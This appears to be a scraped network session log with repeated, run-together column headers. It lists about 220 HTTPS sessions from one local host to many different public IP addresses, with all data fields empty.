                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11050192.168.2.234454419.56.107.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11051192.168.2.234549463.3.56.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11052192.168.2.2353872145.168.129.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11053192.168.2.234552684.125.101.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11054192.168.2.2333028106.33.175.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11055192.168.2.2351156193.40.134.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11056192.168.2.235536259.18.96.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11057192.168.2.2335032162.232.76.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11058192.168.2.2354300197.84.233.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11059192.168.2.233802249.125.233.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11060192.168.2.2343010179.78.9.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11061192.168.2.2343194120.199.212.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11062192.168.2.23399305.57.156.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11063192.168.2.2351082167.120.243.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11064192.168.2.2358208178.145.148.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11065192.168.2.2358382121.84.176.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11066192.168.2.2348384141.24.117.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11067192.168.2.2342560222.60.77.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11068192.168.2.2350414107.7.233.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11069192.168.2.2345632135.71.196.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11070192.168.2.2360578216.155.174.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11071192.168.2.2344426147.30.230.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11072192.168.2.2357816177.19.121.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11073192.168.2.235762854.20.210.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11074192.168.2.2345670190.176.76.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11075192.168.2.2354946153.178.115.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11076192.168.2.234760050.57.249.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11077192.168.2.234844468.3.31.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11078192.168.2.2335298212.7.216.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11079192.168.2.2355408191.85.77.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11080192.168.2.2347010101.27.22.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11081192.168.2.234329473.237.25.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11082192.168.2.234229823.2.81.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11083192.168.2.2357554138.83.39.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11084192.168.2.2344088147.156.213.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11085192.168.2.2347914193.59.255.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11086192.168.2.2346766211.78.250.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11087192.168.2.2339922165.208.46.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11088192.168.2.233323493.97.48.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11089192.168.2.2345666125.181.46.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11090192.168.2.2358952212.218.138.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11091192.168.2.233489037.70.2.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11092192.168.2.234587071.44.214.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11093192.168.2.2345096108.63.169.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11094192.168.2.2356590107.186.247.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11095192.168.2.235460661.230.101.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11096192.168.2.2338946173.244.145.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11097192.168.2.2353624148.36.69.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11098192.168.2.2355090137.40.157.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11099192.168.2.233619212.182.195.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11100192.168.2.233595891.85.236.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11101192.168.2.234872867.20.105.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11102192.168.2.2344558223.163.56.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11103192.168.2.23439588.245.196.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11104192.168.2.234123660.93.183.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11105192.168.2.2356332135.40.19.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11106192.168.2.235648645.164.120.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11107192.168.2.234257460.238.38.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11108192.168.2.235574846.224.151.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11109192.168.2.2356490148.219.167.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11110192.168.2.23340188.238.247.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11111192.168.2.2342698161.102.199.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11112192.168.2.235952486.114.208.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11113192.168.2.2354052145.228.56.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11114192.168.2.235714686.82.149.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11115192.168.2.2333540195.174.125.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11116192.168.2.2359312186.197.244.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11117192.168.2.2355874123.70.158.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11118192.168.2.2357610158.242.59.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11119192.168.2.2333618171.88.250.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11120192.168.2.2358902125.175.136.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11121192.168.2.2338868182.177.114.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11122192.168.2.233594498.225.146.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11123192.168.2.23469705.220.238.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11124192.168.2.2334712188.147.33.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11125192.168.2.2352676174.61.248.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11126192.168.2.2359624195.15.153.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11127192.168.2.2345178218.33.21.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11128192.168.2.233490243.113.59.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11129192.168.2.2342866196.178.175.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11130192.168.2.23446341.242.166.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11131192.168.2.2347380195.65.138.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11132192.168.2.2360652145.194.67.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11133192.168.2.2360744129.123.186.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11134192.168.2.2358706158.188.90.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11135192.168.2.235125071.206.106.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11136192.168.2.2360390186.156.187.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11137192.168.2.2337970143.228.173.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11138192.168.2.2354110104.106.50.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11139192.168.2.2354286179.201.33.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11140192.168.2.2332984183.120.177.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11141192.168.2.234581849.141.237.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11142192.168.2.233904840.77.228.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11143192.168.2.236000225.201.246.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11144192.168.2.2351972108.91.178.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11145192.168.2.234527483.251.148.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11146192.168.2.2334304117.239.112.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11147192.168.2.2336378162.248.178.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11148192.168.2.236037057.94.174.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11149192.168.2.235124874.98.122.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11150192.168.2.235620671.66.73.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11151192.168.2.2354330223.211.32.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11152192.168.2.234026646.243.40.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11153192.168.2.234811039.237.35.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11154192.168.2.235279898.24.93.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11155192.168.2.235260680.64.139.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11156192.168.2.234202243.2.108.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11157192.168.2.2341924202.123.95.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11158192.168.2.235119065.43.206.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11159192.168.2.2353120176.174.159.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11160192.168.2.2355244102.191.109.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11161192.168.2.234826639.164.58.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11162192.168.2.23608268.210.61.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11163192.168.2.2344832107.200.39.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11164192.168.2.2340618151.143.218.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11165192.168.2.2346376210.21.36.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11166192.168.2.2343750160.19.143.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11167192.168.2.2332946128.53.26.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11168192.168.2.2343514202.71.61.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11169192.168.2.234397866.222.201.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11170192.168.2.2354458211.187.6.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11171192.168.2.234775418.111.171.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11172192.168.2.2354004103.150.4.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11173192.168.2.2359026101.17.19.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11174192.168.2.2349576158.191.91.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11175192.168.2.2342378146.7.49.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11176192.168.2.233671037.231.143.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11177192.168.2.233916849.12.25.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11178192.168.2.235290078.75.235.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11179192.168.2.2359940211.90.188.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11180192.168.2.2355636198.230.96.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11181192.168.2.235544888.130.87.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11182192.168.2.2352444117.228.68.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11183192.168.2.2346536167.125.165.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11184192.168.2.234471898.225.130.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11185192.168.2.23410688.82.221.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11186192.168.2.234411841.7.12.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11187192.168.2.2356402159.225.241.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11188192.168.2.234562646.42.140.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11189192.168.2.2347806160.156.214.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11190192.168.2.233580471.204.72.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11191192.168.2.2343412134.35.3.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192192.168.2.2349070160.116.206.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11193192.168.2.2360532100.235.222.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11194192.168.2.2338566155.84.183.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11195192.168.2.233583061.31.37.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11196192.168.2.236074058.59.29.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11197192.168.2.234547065.129.127.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11198192.168.2.2359022134.137.48.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11199192.168.2.2353406157.251.20.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11200192.168.2.234371424.146.199.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11201192.168.2.234029212.204.139.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11202192.168.2.234990065.239.96.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11203192.168.2.234675638.44.215.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11204192.168.2.2356824148.55.150.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11205192.168.2.234248613.8.83.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11206192.168.2.235374020.204.192.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11207192.168.2.2342796208.113.228.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11208192.168.2.2337112115.201.65.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11209192.168.2.2350300115.97.34.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11210192.168.2.2342382105.77.121.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11211192.168.2.2353084148.199.24.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11212192.168.2.233559674.183.164.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11213192.168.2.2353612145.248.210.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11214192.168.2.233413036.1.195.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11215192.168.2.2343908222.49.216.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11216192.168.2.234552280.71.65.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11217192.168.2.2357934188.35.13.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11218192.168.2.2351458208.190.101.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11219192.168.2.2358434221.111.21.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11220192.168.2.2345004192.16.208.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11221192.168.2.2337100199.79.39.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11222192.168.2.23541542.196.122.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11223192.168.2.234631479.127.170.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11224192.168.2.2338940223.116.29.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11225192.168.2.235924472.66.17.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11226192.168.2.233588218.94.235.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11227192.168.2.233967459.242.64.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11228192.168.2.235436235.187.71.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11229192.168.2.235684640.18.139.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11230192.168.2.2335622114.20.36.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11231192.168.2.2333290221.245.10.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11232192.168.2.2338180199.192.139.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11233192.168.2.2333326168.247.172.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11234192.168.2.2360134179.189.187.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11235192.168.2.234506253.161.25.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11236192.168.2.2334024143.78.183.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11237192.168.2.2346458151.214.230.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11238192.168.2.2339660175.208.68.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11239192.168.2.235076473.53.26.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11240192.168.2.235151294.25.203.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11241192.168.2.2338986129.28.87.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11242192.168.2.2350832211.80.20.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11243192.168.2.2343474130.138.192.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11244192.168.2.2340966211.250.133.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11245192.168.2.234051662.54.86.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11246192.168.2.2344718101.144.112.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11247192.168.2.2353632217.230.160.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11248192.168.2.2347320120.244.210.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11249192.168.2.2359560115.228.42.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11250192.168.2.233569638.72.103.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11251192.168.2.2334454121.136.142.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11252192.168.2.2360690186.4.67.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11253192.168.2.235843686.118.169.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11254192.168.2.2354538208.109.41.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11255192.168.2.235983083.1.83.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11256192.168.2.235970225.229.252.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11257192.168.2.2335736134.179.147.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11258192.168.2.235965247.217.166.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11259192.168.2.234621446.27.239.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11260192.168.2.2333006159.235.251.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11261192.168.2.233464862.160.115.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11262192.168.2.2358564153.45.144.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11263192.168.2.2333406157.149.54.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11264192.168.2.2350062165.163.146.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11265192.168.2.235633494.225.73.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11266192.168.2.234616849.75.24.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11267192.168.2.2341354207.94.220.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11268192.168.2.2335014161.238.185.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11269192.168.2.2343282204.169.239.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11270192.168.2.2335698126.227.200.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
